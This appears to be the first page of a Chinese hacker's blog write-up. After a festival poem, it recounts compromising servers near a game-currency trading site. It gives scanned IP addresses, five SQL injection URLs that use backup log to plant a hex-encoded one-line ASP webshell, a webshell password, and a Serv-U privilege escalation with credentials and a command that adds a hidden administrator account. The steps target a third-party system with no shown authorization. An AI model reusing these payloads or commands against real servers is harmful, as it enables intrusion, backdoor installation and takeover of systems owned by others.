今天是中秋节把这个奉献给大家..做一个节日的礼物吧

一轮明月当空照,仟影倚窗前,
缕缕思念寄皓月,酌酒泪两行.
都云月宫嫦娥美,谁知寂寥心,
不羡天上人间美,只眷鸳鸯梦

大家好.这上面的诗,写得不错吧,可惜啊,不是我写的.但是我也挺有才,真的..下面是我改的
一轮明月当空照,仟影电脑前,
缕缕思念寄皓月,只有美女两旁陪.
都云月宫嫦娥美,谁知寂寥心,
不羡天上嫦娥美,只愿下地陪陪我.......哇噻人才啊.相当有才..哈哈哈哈

突然听到旁边有人说:" 别费话,赶紧入正题(!~_^)!! " 刷的一声一个鸡蛋飞在我的头上..
我心想赶紧说吧.要不然一会砖头都上来了. 人家过节都吃月饼,让我吃砖头太不划算了..

我在6月份的时候帮朋友检测了一个国内的游戏币交易网站只要拿到挂马的权限就可以了.
在国内也是大大有名的.

网址:www.abc.com (真实地址隐藏)
ip :221.2.201.165 (真实地址隐藏)

网站系统结构:linux+mysql+apache+php 都是慢慢的检测发现的.

这是这一个php写的网站.我先用x-scan扫描了它的端口.只开了80 别的都没开.我对linux服务的溢出非
 常的菜.我就不打算从这里下手了.我在网站上面看了一个多小时.注入点也没有,上传漏洞和远程包函也没找到
也许是我太菜..最可气的时候.后台我都没有看到..
我仔细的看了,然后我在网上找了.也没有相同的程序 80%也是他们公司自己的开发的.检测这样的站点
更是增加了难度.怎么办呢?不搞了.出去转转.找个美女陪我聊聊天..一个小时候之候就回来了.
换了一个思路,我想从这个网站下手不好使,那我可以从别的网站上试一下试啊.
我用跨站的方式找到同一服务器的别一个网站.更可气的都是同一个家公司的.一个是英文版的一个中文版的,程序
是一样的.就这样我对这个服务器,宣部无条件投降!!

但是我也不能放弃啊.我扫描它这个网段的机器  找了3个比较相近的ip
221.2.201.158
221.2.201.162
221.2.201.167

我就选了221.2.201.167 这个机器.搞了半天还是没进展.还是放弃.但是还有一台机器
221.2.201.162
还是个03系统的.我用啊D快速的找到了这个服务器上面的网站.没想到,老天爷还挺给我面子,竞然还有注入点还是
当前库:abcnews      当前权限DB_OWNER:    当前用户:123.com
这下靠这个可以拿一个webshell了,
我用工具啊D猜解网站的web目录.很快找到了,看起来这个目录是管理员有意改的这样的..他也万万没想到
千里之堤,溃于蚁穴,就这么一个小小注入点就拿到了administrator权限
e:\bew\123.com\
注入点:http://www.123.com/news/GoodsList.asp?GSeqNo=9
一句话的木马e:\bew\123.com\1.asa 
我用nbsi的差异备份功能备份 一句话木马 心里正高兴的呢?心想这回可以拿一个webshell
可是好事总总不能落在我的头上.备份之后我访问这个地址:www.123.com/1.asa
反回404错误页面,文件不存在.我心里是不是被杀了还是怎么回事.于是我又换一句话木马.
提交之后还是同样的错误.想了半天,也不知道是咋回事.还是出去抽根烟吧.都说抽烟有助于活跃思路
(别听我瞎说,我自己说的..)一根烟的功夫,突然想到了一个问题.我以前在遇到这情况的时候的
我在注入点后面加了一个'逗号就可备份一句话了..我这回也试试
第 一 步:
http://www.123.com/news/GoodsList.asp?GSeqNo=9';create table [dbo].[shit_tmp] ([cmd] [image])--
第 二 步
http://www.123.com/news/GoodsList.asp?GSeqNo=9';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--
第 三 步
http://www.123.com/news/GoodsList.asp?GSeqNo=9';insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
第 四 步
http://www.123.com/news/GoodsList.asp?GSeqNo=9';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C006200650077005C006100620063002E0063006F006D005C0031002E00610073006100 backup log @a to disk=@s with init,no_truncate--
第 五 步
http://www.123.com/news/GoodsList.asp?GSeqNo=9';Drop table [shit_tmp]--

我的心就像掉起来似的...特别的紧张.这也不是拍电视,紧张个啥呢?要是这个拿不下.看来就没有必要回忆
这次检测的过程了..恭喜你,你都学会抢答了.成功备提shell..开始上传大马

http://www.123.com/ntop.asp  输入网马地址看这个盼望己久的画面.输入密码.7788223
现在拿到了webshell就准备开始提权的工作了.
上传cmd连只可以运行简单的查看命令net user等等.我打开了C:\Program Files\serv-u 我看到这个目录
我心想它装了serv-u这个提权就方面多了.利用asp网马自带的Servu提权(超强版)提权下.
配置如下:
Serv-U 提升权限 ASP版
用户名:  LocalAdministrator
口 令：  #l@$ak#.lk;0@P
端 口：  43958
系统路径：  c:
命　令：  cmd /c net user xiao xiao  /add & net localgroup administrators xiao /add

[1] [2] 下一页